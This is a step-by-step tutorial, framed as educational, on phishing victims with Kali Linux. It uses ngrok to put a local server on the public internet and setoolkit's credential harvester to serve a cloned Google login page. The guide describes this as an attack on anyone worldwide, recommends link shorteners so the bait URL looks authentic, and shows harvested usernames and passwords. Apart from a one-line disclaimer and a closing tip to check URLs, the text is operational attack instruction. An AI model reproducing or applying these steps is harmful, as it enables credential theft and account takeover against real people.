This articles aims to serve an educational guide to phishing a victim using tools present within Kali Linux alongside some small external tools.
It is important that one is aware to not use these methods in a real-time scenario without realizing the legal cum ethical consequences. With all that said, let’s begin.
Tools Required
- Kali Linux (Any version works. This tutorial is on the version 2020.2)
- Ngrok
- Setoolkit (Always preinstalled in official Kali Distributions)
- Basic knowledge of the Terminal
What is Ngrok and Setoolkit?
Ngrok is a cross-platform application that enables developers to expose a local development server to the Internet with minimal effort. It helps us to redirect any local files you have on a local server to anywhere on the internet.
Meanwhile, Setoolkit is a special tool which enables us to carry out various kinds of Social Engineering attacks. It attacks the human element of a system we are trying to hack into.
Installing Ngrok
- Firstly, create a new account on Ngrok.com. You can use any means available to achieve this (via personal mail, Github or Google).
- Once you do so, you should be able to see something like this -
Since we are working with a Linux Distribution, you need to download the .zip file and thereby follow the steps elucidated within the above image (excluding Fire it up).
Running Ngrok
Now we need to fire up Ngrok. To do this browse to the folder where you unzipped the zip file. And run the following commands -
./ngrok http 80After doing so, you should be getting something like this -
As you can see, we have a Web Interface running which port forwards to one of Ngrok’s servers. We are going to use these very servers to carry out a WAN attack (In layman terms, an attack to anyone in the world) via Phishing. Now that we have a web server running, we can proceed to the phishing stage.
Phishing with Setoolkit
This tool is generally installed in Kali Linux distributions, so there is no need to explicitly worry about it. Even if you don’t have it, you can always look up the official repository on Github and Git Clone it and thereby run the tool.
Since it is preinstalled in my system, all I need to do is run the following command for the tool’s GUI to pop up -
setoolkitOnce we run the command, a GUI like this should pop up -
As you can see we have 3 options for carrying out various kinds of attacks. Phishing is a social-engineering attack so we need to enter 1 in the terminal next to “set>”.
Once we do that, we get the following -
We are interested in using a website to bait a victim, so we shall select 2 here to get the list of options for our intended attack.
Thereby, we get -
Now we need to select 3 since our primary objective is to harvest credentials from our victim (usernames and passwords).
We can use any one of these options to carry out our attack. But to make our objective simple, we will just use 1 for Web Templates.
If you want to use any other site, you can simply enter the URL when you select the Site Cloner option.
As you can see, we are now prompted to enter a certain IP Address to act as the bait. Now here we will be entering the URL we got after running the Ngrok Server. In my case it was 76dd7b71d657.ngrok.io. We are using this URL in order to dispatch our local fake site to a public domain which anyone on the internet can access with a link.
Once you enter the IP Address, we get the list of templates for very popular login sites. In our example, we will just go for Google. So for that, you just need to type in 2 and press Enter.
Now once we do that, we have a server for bait. All we need to do is redirect our victim to the ngrok IP Address. To make the URL seem authentic, one could just shorten the link using services such as Bit.ly or Goo.gl. For this guide, we shall just leave the URL as it is.
So when we open the link in some web browser, we get a cloned copy of the Google Login Page -
I entered an Email ID and password. Now we simply Sign In and see if our tool was able to catch the credentials.
As we can see, we are able to get the entered credentials very easily.
Conclusion
If you have read through and/or followed through the guide, you would have observed the sheer simplicity of being able to nab credentials without your victim batting a keener suspicious eye. It is always good to check any URL, you are prompted to open, especially when it asks for your login details.
